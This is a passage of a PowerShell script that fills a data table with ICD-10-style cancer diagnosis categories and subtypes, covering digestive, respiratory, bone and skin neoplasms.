$DiagnosisList.Rows.Add("Malignant neoplasm of stomach","Malignant neoplasm of stomach, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of small intestine","Malignant neoplasm of duodenum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of small intestine","Malignant neoplasm of jejunum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of small intestine","Malignant neoplasm of ileum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of small intestine","Meckel's diverticulum, malignant") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of small intestine","Malignant neoplasm of overlapping sites of small intestine") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of small intestine","Malignant neoplasm of small intestine, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of cecum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of appendix") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of ascending colon") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of hepatic flexure") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of transverse colon") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of splenic flexure") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of descending colon") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of sigmoid colon") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of overlapping sites of colon") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of colon","Malignant neoplasm of colon, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of rectosigmoid junction","Malignant neoplasm of rectosigmoid junction") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of rectum","Malignant neoplasm of rectum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of anus and anal canal","Malignant neoplasm of anus, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of anus and anal canal","Malignant neoplasm of anal canal") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of anus and anal canal","Malignant neoplasm of cloacogenic zone") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of anus and anal canal","Malignant neoplasm of overlapping sites of rectum, anus and anal canal") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Liver cell carcinoma") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Intrahepatic bile duct carcinoma") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Hepatoblastoma") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Angiosarcoma of liver") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Other sarcomas of liver") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Other specified carcinomas of liver") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Malignant neoplasm of liver, primary, unspecified as to type") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of liver and intrahepatic bile ducts","Malignant neoplasm of liver, not specified as primary or secondary") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of gallbladder","Malignant neoplasm of gallbladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of biliary tract","Malignant neoplasm of extrahepatic bile duct") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of biliary tract","Malignant neoplasm of ampulla of Vater") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of biliary tract","Malignant neoplasm of overlapping sites of biliary tract") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified parts of biliary tract","Malignant neoplasm of biliary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of head of pancreas") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of body of pancreas") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of tail of pancreas") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of pancreatic duct") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of endocrine pancreas") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of other parts of pancreas") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of overlapping sites of pancreas") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of pancreas","Malignant neoplasm of pancreas, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined digestive organs","Malignant neoplasm of intestinal tract, part unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined digestive organs","Malignant neoplasm of spleen") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined digestive organs","Malignant neoplasm of ill-defined sites within the digestive system") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasal cavity and middle ear","Malignant neoplasm of nasal cavity") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nasal cavity and middle ear","Malignant neoplasm of middle ear") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of accessory sinuses","Malignant neoplasm of maxillary sinus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of accessory sinuses","Malignant neoplasm of ethmoidal sinus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of accessory sinuses","Malignant neoplasm of frontal sinus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of accessory sinuses","Malignant neoplasm of sphenoid sinus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of accessory sinuses","Malignant neoplasm of overlapping sites of accessory sinuses") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of accessory sinuses","Malignant neoplasm of accessory sinus, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of larynx","Malignant neoplasm of glottis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of larynx","Malignant neoplasm of supraglottis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of larynx","Malignant neoplasm of subglottis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of larynx","Malignant neoplasm of laryngeal cartilage") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of larynx","Malignant neoplasm of overlapping sites of larynx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of larynx","Malignant neoplasm of larynx, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of trachea","Malignant neoplasm of trachea") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of main bronchus","Malignant neoplasm of unspecified main bronchus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of main bronchus","Malignant neoplasm of right main bronchus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of main bronchus","Malignant neoplasm of left main bronchus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper lobe, bronchus or lung","Malignant neoplasm of upper lobe, unspecified bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper lobe, bronchus or lung","Malignant neoplasm of upper lobe, right bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper lobe, bronchus or lung","Malignant neoplasm of upper lobe, left bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of middle lobe, bronchus or lung","Malignant neoplasm of middle lobe, bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower lobe, bronchus or lung","Malignant neoplasm of lower lobe, unspecified bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower lobe, bronchus or lung","Malignant neoplasm of lower lobe, right bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower lobe, bronchus or lung","Malignant neoplasm of lower lobe, left bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of bronchus and lung","Malignant neoplasm of overlapping sites of unspecified bronchus and lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of bronchus and lung","Malignant neoplasm of overlapping sites of right bronchus and lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of bronchus and lung","Malignant neoplasm of overlapping sites of left bronchus and lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified part of bronchus or lung","Malignant neoplasm of unspecified part of unspecified bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified part of bronchus or lung","Malignant neoplasm of unspecified part of right bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified part of bronchus or lung","Malignant neoplasm of unspecified part of left bronchus or lung") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of thymus","Malignant neoplasm of thymus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of heart, mediastinum and pleura","Malignant neoplasm of heart") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of heart, mediastinum and pleura","Malignant neoplasm of anterior mediastinum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of heart, mediastinum and pleura","Malignant neoplasm of posterior mediastinum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of heart, mediastinum and pleura","Malignant neoplasm of mediastinum, part unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of heart, mediastinum and pleura","Malignant neoplasm of pleura") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of heart, mediastinum and pleura","Malignant neoplasm of overlapping sites of heart, mediastinum and pleura") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites in the respiratory system and intrathoracic organs","Malignant neoplasm of upper respiratory tract, part unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and ill-defined sites in the respiratory system and intrathoracic organs","Malignant neoplasm of lower respiratory tract, part unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of scapula and long bones of upper limb","Malignant neoplasm of scapula and long bones of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of scapula and long bones of upper limb","Malignant neoplasm of scapula and long bones of right upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of scapula and long bones of upper limb","Malignant neoplasm of scapula and long bones of left upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of short bones of upper limb","Malignant neoplasm of short bones of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of short bones of upper limb","Malignant neoplasm of short bones of right upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of short bones of upper limb","Malignant neoplasm of short bones of left upper limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of long bones of lower limb","Malignant neoplasm of long bones of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of long bones of lower limb","Malignant neoplasm of long bones of right lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of long bones of lower limb","Malignant neoplasm of long bones of left lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of short bones of lower limb","Malignant neoplasm of short bones of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of short bones of lower limb","Malignant neoplasm of short bones of right lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of short bones of lower limb","Malignant neoplasm of short bones of left lower limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of bone and articular cartilage of limb","Malignant neoplasm of overlapping sites of bone and articular cartilage of unspecified limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of bone and articular cartilage of limb","Malignant neoplasm of overlapping sites of bone and articular cartilage of right limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of bone and articular cartilage of limb","Malignant neoplasm of overlapping sites of bone and articular cartilage of left limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified bones and articular cartilage of limb","Malignant neoplasm of unspecified bones and articular cartilage of unspecified limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified bones and articular cartilage of limb","Malignant neoplasm of unspecified bones and articular cartilage of right limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified bones and articular cartilage of limb","Malignant neoplasm of unspecified bones and articular cartilage of left limb") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bone and articular cartilage of other and unspecified sites","Malignant neoplasm of bones of skull and face") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bone and articular cartilage of other and unspecified sites","Malignant neoplasm of mandible") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bone and articular cartilage of other and unspecified sites","Malignant neoplasm of vertebral column") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bone and articular cartilage of other and unspecified sites","Malignant neoplasm of ribs, sternum and clavicle") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bone and articular cartilage of other and unspecified sites","Malignant neoplasm of pelvic bones, sacrum and coccyx") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bone and articular cartilage of other and unspecified sites","Malignant neoplasm of bone and articular cartilage, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of skin","Malignant melanoma of lip") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of eyelid, including canthus","Malignant melanoma of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of eyelid, including canthus","Malignant melanoma of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of eyelid, including canthus","Malignant melanoma of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of ear and external auricular canal","Malignant melanoma of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of ear and external auricular canal","Malignant melanoma of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of ear and external auricular canal","Malignant melanoma of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of other and unspecified parts of face","Malignant melanoma of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of other and unspecified parts of face","Malignant melanoma of nose") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of other and unspecified parts of face","Malignant melanoma of other parts of face") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of scalp and neck","Malignant melanoma of scalp and neck") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of trunk","Malignant melanoma of anal skin") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of trunk","Malignant melanoma of skin of breast") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of trunk","Malignant melanoma of other part of trunk") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of upper limb, including shoulder","Malignant melanoma of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of upper limb, including shoulder","Malignant melanoma of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of upper limb, including shoulder","Malignant melanoma of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of lower limb, including hip","Malignant melanoma of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of lower limb, including hip","Malignant melanoma of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of lower limb, including hip","Malignant melanoma of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of overlapping sites of skin","Malignant melanoma of overlapping sites of skin") + $null = $DiagnosisList.Rows.Add("Malignant melanoma of skin, unspecified","Malignant melanoma of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma","Merkel cell carcinoma of lip") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of eyelid, including canthus","Merkel cell carcinoma of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of eyelid, including canthus","Merkel cell carcinoma of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of eyelid, including canthus","Merkel cell carcinoma of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of ear and external auricular canal","Merkel cell carcinoma of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of ear and external auricular canal","Merkel cell carcinoma of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of ear and external auricular canal","Merkel cell carcinoma of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of other and unspecified parts of face","Merkel cell carcinoma of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of other and unspecified parts of face","Merkel cell carcinoma of nose") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of other and unspecified parts of face","Merkel cell carcinoma of other parts of face") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of scalp and neck","Merkel cell carcinoma of scalp and neck") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of trunk","Merkel cell carcinoma of anal skin") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of trunk","Merkel cell carcinoma of skin of breast") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of trunk","Merkel cell carcinoma of other part of trunk") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of upper limb, including shoulder","Merkel cell carcinoma of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of upper limb, including shoulder","Merkel cell carcinoma of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of upper limb, including shoulder","Merkel cell carcinoma of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of lower limb, including hip","Merkel cell carcinoma of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of lower limb, including hip","Merkel cell carcinoma of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of lower limb, including hip","Merkel cell carcinoma of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma of overlapping sites","Merkel cell carcinoma of overlapping sites") + $null = $DiagnosisList.Rows.Add("Merkel cell carcinoma, unspecified","Merkel cell carcinoma, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of lip","Unspecified malignant neoplasm of skin of lip") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of lip","Basal cell carcinoma of skin of lip") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of lip","Squamous cell carcinoma of skin of lip") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of lip","Other specified malignant neoplasm of skin of lip") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of eyelid, including canthus","Unspecified malignant neoplasm of skin of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of eyelid, including canthus","Unspecified malignant neoplasm of skin of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of eyelid, including canthus","Unspecified malignant neoplasm of skin of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of eyelid, including canthus","Basal cell carcinoma of skin of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of eyelid, including canthus","Basal cell carcinoma of skin of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of eyelid, including canthus","Basal cell carcinoma of skin of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of eyelid, including canthus","Squamous cell carcinoma of skin of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of eyelid, including canthus","Squamous cell carcinoma of skin of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of eyelid, including canthus","Squamous cell carcinoma of skin of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of eyelid, including canthus","Other specified malignant neoplasm of skin of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of eyelid, including canthus","Other specified malignant neoplasm of skin of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of eyelid, including canthus","Other specified malignant neoplasm of skin of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of ear and external auricular canal","Unspecified malignant neoplasm of skin of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of ear and external auricular canal","Unspecified malignant neoplasm of skin of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of ear and external auricular canal","Unspecified malignant neoplasm of skin of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of ear and external auricular canal","Basal cell carcinoma of skin of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of ear and external auricular canal","Basal cell carcinoma of skin of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of ear and external auricular canal","Basal cell carcinoma of skin of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of ear and external auricular canal","Squamous cell carcinoma of skin of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of ear and external auricular canal","Squamous cell carcinoma of skin of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of ear and external auricular canal","Squamous cell carcinoma of skin of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of ear and external auricular canal","Other specified malignant neoplasm of skin of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of ear and external auricular canal","Other specified malignant neoplasm of skin of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of ear and external auricular canal","Other specified malignant neoplasm of skin of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of other and unspecified parts of face","Unspecified malignant neoplasm of skin of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of other and unspecified parts of face","Unspecified malignant neoplasm of skin of nose") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of other and unspecified parts of face","Unspecified malignant neoplasm of skin of other parts of face") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of other and unspecified parts of face","Basal cell carcinoma of skin of unspecified parts of face") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of other and unspecified parts of face","Basal cell carcinoma of skin of nose") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of other and unspecified parts of face","Basal cell carcinoma of skin of other parts of face") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of other and unspecified parts of face","Squamous cell carcinoma of skin of unspecified parts of face") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of other and unspecified parts of face","Squamous cell carcinoma of skin of nose") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of other and unspecified parts of face","Squamous cell carcinoma of skin of other parts of face") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of other and unspecified parts of face","Other specified malignant neoplasm of skin of unspecified parts of face") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of other and unspecified parts of face","Other specified malignant neoplasm of skin of nose") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of other and unspecified parts of face","Other specified malignant neoplasm of skin of other parts of face") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of scalp and neck","Unspecified malignant neoplasm of skin of scalp and neck") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of scalp and neck","Basal cell carcinoma of skin of scalp and neck") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of scalp and neck","Squamous cell carcinoma of skin of scalp and neck") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin of scalp and neck","Other specified malignant neoplasm of skin of scalp and neck") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of trunk","Unspecified malignant neoplasm of anal skin") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of trunk","Unspecified malignant neoplasm of skin of breast") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of trunk","Unspecified malignant neoplasm of skin of other part of trunk") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of trunk","Basal cell carcinoma of anal skin") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of trunk","Basal cell carcinoma of skin of breast") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of trunk","Basal cell carcinoma of skin of other part of trunk") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of trunk","Squamous cell carcinoma of anal skin") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of trunk","Squamous cell carcinoma of skin of breast") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of trunk","Squamous cell carcinoma of skin of other part of trunk") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of trunk","Other specified malignant neoplasm of anal skin") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of trunk","Other specified malignant neoplasm of skin of breast") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of trunk","Other specified malignant neoplasm of skin of other part of trunk") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of upper limb, including shoulder","Unspecified malignant neoplasm of skin of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of upper limb, including shoulder","Unspecified malignant neoplasm of skin of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of upper limb, including shoulder","Unspecified malignant neoplasm of skin of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of upper limb, including shoulder","Basal cell carcinoma of skin of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of upper limb, including shoulder","Basal cell carcinoma of skin of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of upper limb, including shoulder","Basal cell carcinoma of skin of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of upper limb, including shoulder","Squamous cell carcinoma of skin of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of upper limb, including shoulder","Squamous cell carcinoma of skin of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of upper limb, including shoulder","Squamous cell carcinoma of skin of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of upper limb, including shoulder","Other specified malignant neoplasm of skin of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of upper limb, including shoulder","Other specified malignant neoplasm of skin of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of upper limb, including shoulder","Other specified malignant neoplasm of skin of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of lower limb, including hip","Unspecified malignant neoplasm of skin of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of lower limb, including hip","Unspecified malignant neoplasm of skin of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Unspecified malignant neoplasm of skin of lower limb, including hip","Unspecified malignant neoplasm of skin of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of lower limb, including hip","Basal cell carcinoma of skin of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of lower limb, including hip","Basal cell carcinoma of skin of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Basal cell carcinoma of skin of lower limb, including hip","Basal cell carcinoma of skin of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of lower limb, including hip","Squamous cell carcinoma of skin of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of lower limb, including hip","Squamous cell carcinoma of skin of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Squamous cell carcinoma of skin of lower limb, including hip","Squamous cell carcinoma of skin of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of lower limb, including hip","Other specified malignant neoplasm of skin of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of lower limb, including hip","Other specified malignant neoplasm of skin of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasm of skin of lower limb, including hip","Other specified malignant neoplasm of skin of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of overlapping sites of skin","Unspecified malignant neoplasm of overlapping sites of skin") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of overlapping sites of skin","Basal cell carcinoma of overlapping sites of 